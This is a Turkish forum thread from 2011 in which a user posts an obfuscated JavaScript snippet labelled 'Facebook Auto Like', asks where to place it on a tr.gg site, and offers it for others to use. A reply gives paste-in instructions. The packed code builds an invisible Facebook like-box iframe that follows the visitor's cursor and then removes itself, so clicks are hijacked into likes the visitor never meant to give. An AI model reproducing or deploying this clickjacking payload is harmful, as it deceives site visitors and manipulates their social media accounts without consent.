Forum'da ara:
Ara


« Önceki başlık :: Sonraki başlık »  
Yazar Mesaj
Mesaj01.08.2011, 15:15 (UTC)    
Mesaj konusu: Script Kodları Nereye Koyulur?

Script Kodlarını tr.gg sitelerinde nereye koyacağımı bulamadım yardım ederseniz sevinirim ..

Kod Facebook Auto Like


Kod:
<script>

var Visibility = 0 /* 1= visible  0= invisible */
var disappearance = 10000 /* invisible time 10000 = 10 second */
var FakerLikerSrc = "http://www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/pages/BenParonayakDeğiliz/123870901035814?ref=ts&amp;width=292&amp;colorscheme=light&amp;show_faces=true&amp;stream=true&amp;header=true&amp;height=427";

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?´´:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!´´.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return´w+´};c=1};while(c--)if(k[c])p=p.replace(new RegExp(´b´+e(c)+´b´,´g´),k[c]);return p}(´d T=1C.1u;d n="";d m="";6(T=="1t 1s 1q"){6(U==1){n=´´}h{n=´1p:10(f=1); -1f-f:0.0; -1e-f: 0.0; f:0.0;´};3.1d("<V 2="v:E !K;w:x; y:1b; q:19; A:B; "+n+"" 18="r"><t F=""+G+"" H="I" 14="0" 13="0" 12="0" 2="v:E !K;M:N; w:x; y:11; q:1j;" Q="l"></t></V>");d c=3.X(´r´);9 s(e){6(3.W)e=p;c.2.Y=e.Z-4;c.2.P=e.O-5;L g}9 J(){3.X(´r´).2.15=´N´}3.16.17=s;9 C(){z("J()",1a)}k.1c=C}h{(9(){d a=0,7=0,o=3.W?l:g;6(!o)3.1g(1h.1i);6(U==1){m=1}h{m=0};d b=3.1k(´t´);b.F=G;b.H=´I´;b.1l=0;b.Q=´l´;b.2.M=0;b.2.w=´x´;b.2.v=´1m´;b.2.y=´1n´;b.2.q=´1o´;b.2.A=´B´;b.2.f=m;3.R(´i´)[0].1r(b);k.D(´u´,j,g);z(9(){k.D(´u´,j,g);3.R(´i´)[0].1v(b);k.1w(´u´,j,g)},1x);9 j(e){6(o){a=p.Z+3.i.1y;7=p.O+3.i.1z}h{a=e.1A;7=e.1B}6(a<0)a=0;6(7<0)7=0;b.2.P=(7-8)+´S´;b.2.Y=(a-1D)+´S´;L l}})()}´,62,102,´||style|document|||if|tempY||function||||var||opacity|false|else|body|mouseMove|window|true|movis|ievis|IE|event|height|ifgh||iframe|mousemove|cursor|overflow|hidden|width|setTimeout|position|absolute|init|addEventListener|default|src|FakerLikerSrc|scrolling|no|finde|important|return|border|none|clientY|top|allowTransparency|getElementsByTagName|px|browser|Visibility|div|all|getElementById|left|clientX|alpha|65px|marginheight|marginwidth|frameborder|display|documentElement|onmousemove|id|12px|disappearance|5px|onload|write|khtml|moz|captureEvents|Event|MOUSEMOVE|21px|createElement|frameBorder|pointer|53px|23px|filter|Explorer|appendChild|Internet|Microsoft|appName|removeChild|removeEventListener|10000|scrollLeft|scrollTop|pageX|pageY|navigator|25´.split(´|´),0,{}))
</script>


Şimdiden Teşekkürler..

Kodu İsterseniz Kullanabilirsiniz zaten bunun için koydum Very Happy
Mesaj01.08.2011, 18:01 (UTC)    
Mesaj konusu:

Nerde kullanmak isteyecegine baglı

butun sayfalarda gozukmesını ıstıyorsan

Tasarım ayarları

css

css coprigyt e koy

göndere bas

eger olmadı kod gozukmuyor diyorsan

tasarım ustu veya altına koy gonder

ana sayfada kullanmak istiyorsan

Sayfalarımı degistir
kaynaga tıkla
kodu yapıstır kaydet

Wink

başarılar
______________
@tr.gg dısı link yasak
Önceki mesajları göster:   


Powered by phpBB © 2001, 2005 phpBB Group
Türkçe Çeviri: phpBB Türkiye & Erdem Çorapçıoğlu